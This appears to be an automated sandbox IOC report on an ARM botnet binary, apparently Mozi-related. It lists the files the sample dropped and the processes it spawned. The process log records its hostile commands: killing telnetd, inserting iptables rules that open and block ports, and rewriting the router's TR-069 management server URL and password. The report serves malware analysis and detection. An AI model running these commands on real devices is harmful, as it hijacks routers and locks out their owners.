IOC Report

loading gif

Files

File Path
Type
Category
Malicious
bin.sh
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
initial sample
malicious
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
malicious
/etc/init.d/bootmisc.sh
ASCII text
dropped
malicious
/etc/init.d/checkfs.sh
ASCII text
dropped
malicious
/etc/init.d/checkroot-bootclean.sh
ASCII text
dropped
malicious
/etc/init.d/checkroot.sh
ASCII text
dropped
malicious
/etc/init.d/hostname.sh
ASCII text
dropped
malicious
/etc/init.d/hwclock.sh
ASCII text
dropped
malicious
/etc/init.d/mountall-bootclean.sh
ASCII text
dropped
malicious
/etc/init.d/mountall.sh
ASCII text
dropped
malicious
/etc/init.d/mountdevsubfs.sh
ASCII text
dropped
malicious
/etc/init.d/mountkernfs.sh
ASCII text
dropped
malicious
/etc/init.d/mountnfs-bootclean.sh
ASCII text
dropped
malicious
/etc/init.d/mountnfs.sh
ASCII text
dropped
malicious
/etc/init.d/umountnfs.sh
ASCII text
dropped
malicious
/etc/profile.d/Z97-byobu.sh
ASCII text
dropped
malicious
/etc/profile.d/apps-bin-path.sh
ASCII text
dropped
malicious
/etc/profile.d/bash_completion.sh
ASCII text
dropped
malicious
/etc/profile.d/cedilla-portuguese.sh
ASCII text
dropped
malicious
/etc/profile.d/vte-2.91.sh
ASCII text
dropped
malicious
/etc/rc.local
ASCII text
dropped
malicious
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
malicious
/usr/bin/gettext.sh
ASCII text
dropped
malicious
/usr/networks
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
dropped
malicious
/usr/sbin/alsa-info.sh
ASCII text, with very long lines
dropped
malicious
/boot/grub/i386-pc/modinfo.sh
ASCII text
dropped
clean
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
dropped
clean
/etc/acpi/asus-wireless.sh
ASCII text
dropped
clean
/etc/acpi/ibm-wireless.sh
ASCII text
dropped
clean
/etc/acpi/powerbtn.sh
ASCII text
dropped
clean
/etc/acpi/tosh-wireless.sh
ASCII text
dropped
clean
/etc/acpi/undock.sh
ASCII text
dropped
clean
/etc/bash_completion.d/libreoffice.sh
ASCII text
dropped
clean
/etc/wpa_supplicant/action_wpa.sh
ASCII text
dropped
clean
/etc/wpa_supplicant/functions.sh
ASCII text
dropped
clean
/etc/wpa_supplicant/ifupdown.sh
ASCII text
dropped
clean
/tmp/.config
ASCII text
dropped
clean
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
dropped
clean
/usr/share/alsa/utils.sh
ASCII text
dropped
clean
/usr/share/brltty/initramfs/brltty.sh
ASCII text
dropped
clean
/usr/share/cups/braille/cups-braille.sh
UTF-8 Unicode text
dropped
clean
/usr/share/cups/braille/index.sh
ASCII text
dropped
clean
/usr/share/cups/braille/indexv3.sh
ASCII text
dropped
clean
/usr/share/cups/braille/indexv4.sh
ASCII text
dropped
clean
/usr/share/debconf/confmodule.sh
ASCII text
dropped
clean
/usr/share/doc/acpid/examples/ac.sh
ASCII text
dropped
clean
/usr/share/doc/acpid/examples/default.sh
ASCII text
dropped
clean
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
dropped
clean
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
dropped
clean
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
dropped
clean
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-am.sh
OS/2 REXX batch file, ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-checkout.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-clean.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-clone.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-commit.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-fetch.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-gc.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-log.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-ls-remote.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-merge-ours.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-merge.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-notes.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-pull.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-repack.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-reset.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-resolve.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-revert.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-tag.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-verify-tag.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-whatchanged.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
dropped
clean
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
dropped
clean
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
dropped
clean
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/check-mac-address.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/get-mac-address.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/ping-places.sh
ASCII text
dropped
clean
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
dropped
clean
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
dropped
clean
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
dropped
clean
/usr/share/doc/mdadm/examples/mdadd.sh
ASCII text
dropped
clean
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
dropped
clean
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
dropped
clean
/usr/share/doc/tmux/examples/bash_completion_tmux.sh
ASCII text
dropped
clean
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
ASCII text
dropped
clean
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
ASCII text
dropped
clean
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
dropped
clean
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
dropped
clean
/usr/share/hplip/hplip_clean.sh
ASCII text
dropped
clean
/usr/share/keyutils/request-key-debug.sh
ASCII text
dropped
clean
/usr/share/lightdm/guest-session/setup.sh
ASCII text
dropped
clean
/usr/share/os-prober/common.sh
ASCII text
dropped
clean
/usr/share/vim/vim74/macros/less.sh
ASCII text
dropped
clean
/usr/share/xscreensaver/xscreensaver-wrapper.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/autoload.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/status.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/udev-install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/features/list-arch.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/s390/config3270.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/arm/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/kernel/vdso/gen_vdso_offsets.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/blackfin/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/ia64/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/m32r/boot/compressed/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/m68k/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/mn10300/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/nios2/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/parisc/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/prom_init_check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/systbl_chk.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/relocs_check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/s390/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/sh/boot/compressed/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/sparc/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/entry/vdso/checkundef.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/kernel/cpu/mkcapflags.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/tools/calc_run_size.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/um/vdso/checkundef.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/parameters.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_bench_xmit_mode_netif_receive.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample01_simple.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample02_multiqueue.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample03_burst_single_flow.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/check_extable.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/checksyscalls.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/decode_stacktrace.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/depmod.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/dtc/update-dtc-source.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-goto.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-version.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_32-has-stack-protector.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_64-has-stack-protector.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gen_initramfs_list.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/headers.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/headers_install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/lxdialog/check-lxdialog.sh
C source, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/merge_config.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/ld-version.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/link-vmlinux.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/mkuboot.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/selinux/install_policy.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/tags.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/xen-hypercalls.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/xz_wrap.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/spl/autogen.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/spl/scripts/check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/build/tests/run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/bondvf.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dhcp_info.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dns_info.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_set_ifconfig.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/nfsd/inject_fault.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/arch/x86/tests/gen-insn-x86-dat.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-archive.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-completion.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-with-kcore.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/util/generate-cmdlist.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_plot.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_script.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/utils/version-gen.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/fault-injection/failcmd.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/cpu-hotplug/cpu-on-off-test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/efivarfs/efivarfs.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_filesystem.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_userhelper.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/functional/run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/gen_kselftest_tar.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/kselftest_install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memfd/run_fuse_test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memory-hotplug/mem-on-off-test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/net/test_bpf.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/config2frag.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configNR_CPUS.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configcheck.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configinit.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/cpus2use.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-build.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-lock.sh
awk or perl script, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-rcu.sh
awk or perl script, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-test-1-run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm.sh
awk or perl script, ASCII text, with very long lines
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-build.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-console.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-torture.sh
awk or perl script, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/lock/ver_functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/rcu/ver_functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/static_keys/test_static_keys.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/user/test_user_copy.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/x86/check_cc.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram01.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram02.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram_lib.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/time/udelay_test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/usb/hcd-tests.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/autogen.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/cleanup.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/vm/slabinfo-gnuplot.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/zfs/autogen.sh
ASCII text
dropped
clean
/var/crash/_usr_share_apport_apport-checkreports.1000.crash
ASCII text
dropped
clean
/var/crash/_usr_share_apport_apport-gtk.1000.crash
ASCII text
dropped
clean
There are 212 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
/tmp/bin.sh
/usr/bin/qemu-arm /tmp/bin.sh
clean
/tmp/bin.sh
n/a
clean
/tmp/bin.sh
n/a
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
clean
/bin/sh
n/a
clean
/usr/bin/killall
killall -9 telnetd utelnetd scfgmgr
clean
/tmp/bin.sh
n/a
clean
/tmp/bin.sh
n/a
clean
/tmp/bin.sh
n/a
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT
clean
/sbin/iptables
n/a
clean
/sbin/modprobe
/sbin/modprobe ip_tables
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 47453 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 47453 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/tmp/bin.sh
n/a
clean
/tmp/bin.sh
n/a
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 58000 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 58000 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 58000 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 35000 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 50023 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 7547 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 35000 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 50023 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 50023 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 35000 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 7547 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 7547 -j DROP
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --dport 4000 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p udp --dport 4000 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT
clean
/tmp/bin.sh
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT
clean
/sbin/upstart
n/a
clean
/bin/sh
/bin/sh -e /proc/self/fd/9
clean
/bin/sh
n/a
clean
/bin/date
date
clean
/bin/sh
n/a
clean
/usr/share/apport/apport-checkreports
/usr/bin/python3 /usr/share/apport/apport-checkreports --system
clean
/sbin/upstart
n/a
clean
/bin/sh
/bin/sh -e /proc/self/fd/9
clean
/bin/sh
n/a
clean
/bin/date
date
